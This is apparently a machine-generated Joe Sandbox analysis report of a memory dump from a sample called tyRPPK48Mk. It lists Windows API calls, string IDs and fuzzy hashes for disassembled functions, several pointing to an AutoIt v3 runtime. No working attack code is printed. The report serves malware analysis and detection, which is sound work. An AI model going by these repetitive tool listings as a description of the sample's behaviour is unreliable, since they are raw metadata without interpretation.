                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: MessageSendWindow$Rect$LongMonitor$CopyCreateCursorDesktopDestroyFromInfoPointVisible
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: ($,$tooltips_class32
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 225202481-3320066284
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: d36279d6046af7916fa8cb53b873a9c87cdaa8c87180e7b1c59dea88ca998a74
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: fcdb4dd5bfb9c4cfeeadc9569793f3eee26ed74f2078e1bfb0220ba6a1b85fea
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d36279d6046af7916fa8cb53b873a9c87cdaa8c87180e7b1c59dea88ca998a74
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4CB17170A00205AFDB54DFA4CD85BAEB7B4BF48304F10895DE919BB282D778A949CB58
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • _wcslen.LIBCMT ref: 00454EB0
                                                                                                                                                                                                                                                                                                                                                                                                                                • _wcslen.LIBCMT ref: 00454EC3
                                                                                                                                                                                                                                                                                                                                                                                                                                • __wcsicoll.LIBCMT ref: 00454ED0
                                                                                                                                                                                                                                                                                                                                                                                                                                • _wcslen.LIBCMT ref: 00454EE4
                                                                                                                                                                                                                                                                                                                                                                                                                                • __wcsicoll.LIBCMT ref: 00454EF1
                                                                                                                                                                                                                                                                                                                                                                                                                                • _wcslen.LIBCMT ref: 00454F05
                                                                                                                                                                                                                                                                                                                                                                                                                                • __wcsicoll.LIBCMT ref: 00454F12
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004114AB: __wcsicmp_l.LIBCMT ref: 0041152B
                                                                                                                                                                                                                                                                                                                                                                                                                                • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 00454F48
                                                                                                                                                                                                                                                                                                                                                                                                                                • LoadLibraryExW.KERNEL32(?,00000000,00000032), ref: 00454F5B
                                                                                                                                                                                                                                                                                                                                                                                                                                • LoadImageW.USER32(?,00000000,?,00000001,?,?), ref: 00454F9B
                                                                                                                                                                                                                                                                                                                                                                                                                                • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00454FE5
                                                                                                                                                                                                                                                                                                                                                                                                                                • LoadImageW.USER32(?,00000000,?,00000001,?,?), ref: 00455016
                                                                                                                                                                                                                                                                                                                                                                                                                                • FreeLibrary.KERNEL32(?,?), ref: 00455023
                                                                                                                                                                                                                                                                                                                                                                                                                                • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0045507D
                                                                                                                                                                                                                                                                                                                                                                                                                                • DestroyIcon.USER32(?), ref: 0045508B
                                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 004550A8
                                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 004550B4
                                                                                                                                                                                                                                                                                                                                                                                                                                • MoveWindow.USER32(?,?,?,?,?,00000001), ref: 004550D9
                                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Load$Image_wcslen$__wcsicoll$IconLibraryMessageSend$DestroyExtractFreeMoveWindow__wcsicmp_l
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: .dll$.exe$.icl
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 2511167534-1154884017
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetWindowRect.USER32(?,?), ref: 00471CF7
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetClientRect.USER32(?,?), ref: 00471D05
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetSystemMetrics.USER32(00000007), ref: 00471D0D
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetSystemMetrics.USER32(00000008), ref: 00471D20
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetSystemMetrics.USER32(00000004), ref: 00471D42
                                                                                                                                                                                                                                                                                                                                                                                                                                • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00471D71
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetSystemMetrics.USER32(00000007), ref: 00471D79
                                                                                                                                                                                                                                                                                                                                                                                                                                • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00471DA3
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetSystemMetrics.USER32(00000008), ref: 00471DAB
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetSystemMetrics.USER32(00000004), ref: 00471DCF
                                                                                                                                                                                                                                                                                                                                                                                                                                • SetRect.USER32(?,00000000,00000000,?,?), ref: 00471DEE
                                                                                                                                                                                                                                                                                                                                                                                                                                • AdjustWindowRectEx.USER32(?,?,00000000,00000040), ref: 00471DFF
                                                                                                                                                                                                                                                                                                                                                                                                                                • CreateWindowExW.USER32(00000040,AutoIt v3 GUI,?,?,?,?,?,?,?,00000000,00400000,00000000), ref: 00471E35
                                                                                                                                                                                                                                                                                                                                                                                                                                • SetWindowLongW.USER32(00000000,000000EB,?), ref: 00471E6E
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetClientRect.USER32(?,?), ref: 00471E8A
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetStockObject.GDI32(00000011), ref: 00471EA6
                                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000030,00000000), ref: 00471EB2
                                                                                                                                                                                                                                                                                                                                                                                                                                • SetTimer.USER32(00000000,00000000,00000028,00462986), ref: 00471ED9
                                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: System$Metrics$Rect$Window$ClientInfoParameters$AdjustCreateLongMessageObjectSendStockTimer_malloc
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: @$AutoIt v3 GUI
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 867697134-3359773793
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: __wcsicoll$__wcsnicmp
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:$pQH
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 790654849-32604322
Memory Dump Source
• Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
APIs
  • Part of subcall function 00442C5A: __time64.LIBCMT ref: 00442C66
• _fseek.LIBCMT ref: 00452B3B
• __wsplitpath.LIBCMT ref: 00452B9B
• _wcscpy.LIBCMT ref: 00452BB0
• _wcscat.LIBCMT ref: 00452BC5
• __wsplitpath.LIBCMT ref: 00452BEF
• _wcscat.LIBCMT ref: 00452C07
• _wcscat.LIBCMT ref: 00452C1C
• __fread_nolock.LIBCMT ref: 00452C53
• __fread_nolock.LIBCMT ref: 00452C64
• __fread_nolock.LIBCMT ref: 00452C83
• __fread_nolock.LIBCMT ref: 00452C94
• __fread_nolock.LIBCMT ref: 00452CB5
• __fread_nolock.LIBCMT ref: 00452CC6
• __fread_nolock.LIBCMT ref: 00452CD7
• __fread_nolock.LIBCMT ref: 00452CE8
  • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 0045273E
  • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 00452780
  • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 0045279E
  • Part of subcall function 00452719: _wcscpy.LIBCMT ref: 004527D2
  • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 004527E2
  • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 00452800
  • Part of subcall function 00452719: _wcscpy.LIBCMT ref: 00452831
• __fread_nolock.LIBCMT ref: 00452D78
Memory Dump Source
• Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
Similarity
• API ID: __fread_nolock$_wcscat_wcscpy$__wsplitpath$__time64_fseek
• String ID:
• API String ID: 2054058615-0
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 004487BD
                                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Window
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: 0
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 2353593579-4108050209
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetSysColor.USER32(0000000F), ref: 0044A05E
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetClientRect.USER32(?,?), ref: 0044A0D1
                                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001328,00000000,?), ref: 0044A0E9
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetWindowDC.USER32(?), ref: 0044A0F6
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetPixel.GDI32(00000000,?,?), ref: 0044A108
                                                                                                                                                                                                                                                                                                                                                                                                                                • ReleaseDC.USER32(?,?), ref: 0044A11B
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetSysColor.USER32(0000000F), ref: 0044A131
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 0044A140
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetSysColor.USER32(0000000F), ref: 0044A14F
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetSysColor.USER32(00000005), ref: 0044A15B
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetWindowDC.USER32(?), ref: 0044A1BE
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetPixel.GDI32(00000000,00000000,00000000), ref: 0044A1CB
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetPixel.GDI32(00000000,?,00000000), ref: 0044A1E4
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetPixel.GDI32(00000000,00000000,?), ref: 0044A1FD
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetPixel.GDI32(00000000,?,?), ref: 0044A21D
                                                                                                                                                                                                                                                                                                                                                                                                                                • ReleaseDC.USER32(?,00000000), ref: 0044A229
                                                                                                                                                                                                                                                                                                                                                                                                                                • SetBkColor.GDI32(?,00000000), ref: 0044A24C
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetSysColor.USER32(00000008), ref: 0044A265
                                                                                                                                                                                                                                                                                                                                                                                                                                • SetTextColor.GDI32(?,00000000), ref: 0044A270
                                                                                                                                                                                                                                                                                                                                                                                                                                • SetBkMode.GDI32(?,00000001), ref: 0044A282
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetStockObject.GDI32(00000005), ref: 0044A28A
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Color$Pixel$Window$Release$ClientLongMessageModeObjectRectSendStockText
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 1744303182-0
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,004164DE), ref: 00417C28
                                                                                                                                                                                                                                                                                                                                                                                                                                • __mtterm.LIBCMT ref: 00417C34
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004178FF: TlsFree.KERNEL32(00000017,00417D96,?,004164DE), ref: 0041792A
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004178FF: DeleteCriticalSection.KERNEL32(00000000,00000000,00410E44,?,00417D96,?,004164DE), ref: 004181B8
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004178FF: _free.LIBCMT ref: 004181BB
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004178FF: DeleteCriticalSection.KERNEL32(00000017,00410E44,?,00417D96,?,004164DE), ref: 004181E2
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00417C4A
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00417C57
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00417C64
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00417C71
                                                                                                                                                                                                                                                                                                                                                                                                                                • TlsAlloc.KERNEL32(?,004164DE), ref: 00417CC1
                                                                                                                                                                                                                                                                                                                                                                                                                                • TlsSetValue.KERNEL32(00000000,?,004164DE), ref: 00417CDC
                                                                                                                                                                                                                                                                                                                                                                                                                                • __init_pointers.LIBCMT ref: 00417CE6
                                                                                                                                                                                                                                                                                                                                                                                                                                • __calloc_crt.LIBCMT ref: 00417D54
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 00417D80
                                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: AddressProc$CriticalDeleteSection$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__mtterm_free
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 4163708885-3819984048
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetForegroundWindow.USER32(?,?,?,?,?,?,?), ref: 0046EE79
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetForegroundWindow.USER32(?,?,?,?,?,?), ref: 0046F265
                                                                                                                                                                                                                                                                                                                                                                                                                                • IsWindow.USER32(?), ref: 0046F29A
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetDesktopWindow.USER32 ref: 0046F356
                                                                                                                                                                                                                                                                                                                                                                                                                                • EnumChildWindows.USER32(00000000), ref: 0046F35D
                                                                                                                                                                                                                                                                                                                                                                                                                                • EnumWindows.USER32(0046130D,?), ref: 0046F365
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00445AE0: _wcslen.LIBCMT ref: 00445AF0
                                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Window$EnumForegroundWindows_wcslen$ChildDesktop_memmove
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: ACTIVE$ALL$CLASS$HANDLE$INSTANCE$LAST$REGEXPCLASS$REGEXPTITLE$TITLE
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 329138477-1919597938
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetLocalTime.KERNEL32(?), ref: 0045DFE5
                                                                                                                                                                                                                                                                                                                                                                                                                                • SystemTimeToFileTime.KERNEL32(?,?), ref: 0045DFF5
                                                                                                                                                                                                                                                                                                                                                                                                                                • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 0045E001
                                                                                                                                                                                                                                                                                                                                                                                                                                • _wcsncpy.LIBCMT ref: 0045E020
                                                                                                                                                                                                                                                                                                                                                                                                                                • __wsplitpath.LIBCMT ref: 0045E065
                                                                                                                                                                                                                                                                                                                                                                                                                                • _wcscat.LIBCMT ref: 0045E07D
                                                                                                                                                                                                                                                                                                                                                                                                                                • _wcscat.LIBCMT ref: 0045E08F
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 0045E0A4
                                                                                                                                                                                                                                                                                                                                                                                                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 0045E0B8
                                                                                                                                                                                                                                                                                                                                                                                                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 0045E0F6
                                                                                                                                                                                                                                                                                                                                                                                                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 0045E10C
                                                                                                                                                                                                                                                                                                                                                                                                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 0045E11E
                                                                                                                                                                                                                                                                                                                                                                                                                                • _wcscpy.LIBCMT ref: 0045E12A
                                                                                                                                                                                                                                                                                                                                                                                                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 0045E170
                                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: CurrentDirectory$Time$File$Local_wcscat$System__wsplitpath_wcscpy_wcsncpy
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: *.*
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 3201719729-438819550
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: __wcsicoll$IconLoad
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: blank$info$question$stop$warning
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 2485277191-404129466
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • LoadIconW.USER32(?,00000063), ref: 0045464C
                                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 0045465E
                                                                                                                                                                                                                                                                                                                                                                                                                                • SetWindowTextW.USER32(?,?), ref: 00454678
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetDlgItem.USER32(?,000003EA), ref: 00454690
                                                                                                                                                                                                                                                                                                                                                                                                                                • SetWindowTextW.USER32(00000000,?), ref: 00454697
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetDlgItem.USER32(?,000003E9), ref: 004546A8
                                                                                                                                                                                                                                                                                                                                                                                                                                • SetWindowTextW.USER32(00000000,?), ref: 004546AF
                                                                                                                                                                                                                                                                                                                                                                                                                                • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 004546D1
                                                                                                                                                                                                                                                                                                                                                                                                                                • SendDlgItemMessageW.USER32(?,000003E9,000000C5,?,00000000), ref: 004546EB
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetWindowRect.USER32(?,?), ref: 004546F5
                                                                                                                                                                                                                                                                                                                                                                                                                                • SetWindowTextW.USER32(?,?), ref: 00454765
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetDesktopWindow.USER32 ref: 0045476F
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetWindowRect.USER32(00000000), ref: 00454776
                                                                                                                                                                                                                                                                                                                                                                                                                                • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 004547C4
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetClientRect.USER32(?,?), ref: 004547D2
                                                                                                                                                                                                                                                                                                                                                                                                                                • PostMessageW.USER32(?,00000005,00000000,00000080), ref: 004547FC
                                                                                                                                                                                                                                                                                                                                                                                                                                • SetTimer.USER32(?,0000040A,?,00000000), ref: 0045483F
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 3869813825-0
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • LoadCursorW.USER32(00000000,00007F8A), ref: 00458EBF
                                                                                                                                                                                                                                                                                                                                                                                                                                • LoadCursorW.USER32(00000000,00007F00), ref: 00458ECB
                                                                                                                                                                                                                                                                                                                                                                                                                                • LoadCursorW.USER32(00000000,00007F03), ref: 00458ED7
                                                                                                                                                                                                                                                                                                                                                                                                                                • LoadCursorW.USER32(00000000,00007F8B), ref: 00458EE3
                                                                                                                                                                                                                                                                                                                                                                                                                                • LoadCursorW.USER32(00000000,00007F01), ref: 00458EEF
                                                                                                                                                                                                                                                                                                                                                                                                                                • LoadCursorW.USER32(00000000,00007F81), ref: 00458EFB
                                                                                                                                                                                                                                                                                                                                                                                                                                • LoadCursorW.USER32(00000000,00007F88), ref: 00458F07
                                                                                                                                                                                                                                                                                                                                                                                                                                • LoadCursorW.USER32(00000000,00007F80), ref: 00458F13
                                                                                                                                                                                                                                                                                                                                                                                                                                • LoadCursorW.USER32(00000000,00007F86), ref: 00458F1F
                                                                                                                                                                                                                                                                                                                                                                                                                                • LoadCursorW.USER32(00000000,00007F83), ref: 00458F2B
                                                                                                                                                                                                                                                                                                                                                                                                                                • LoadCursorW.USER32(00000000,00007F85), ref: 00458F37
                                                                                                                                                                                                                                                                                                                                                                                                                                • LoadCursorW.USER32(00000000,00007F82), ref: 00458F43
                                                                                                                                                                                                                                                                                                                                                                                                                                • LoadCursorW.USER32(00000000,00007F84), ref: 00458F4F
                                                                                                                                                                                                                                                                                                                                                                                                                                • LoadCursorW.USER32(00000000,00007F04), ref: 00458F5B
                                                                                                                                                                                                                                                                                                                                                                                                                                • LoadCursorW.USER32(00000000,00007F02), ref: 00458F67
                                                                                                                                                                                                                                                                                                                                                                                                                                • LoadCursorW.USER32(00000000,00007F89), ref: 00458F73
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetCursorInfo.USER32(?), ref: 00458F83
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
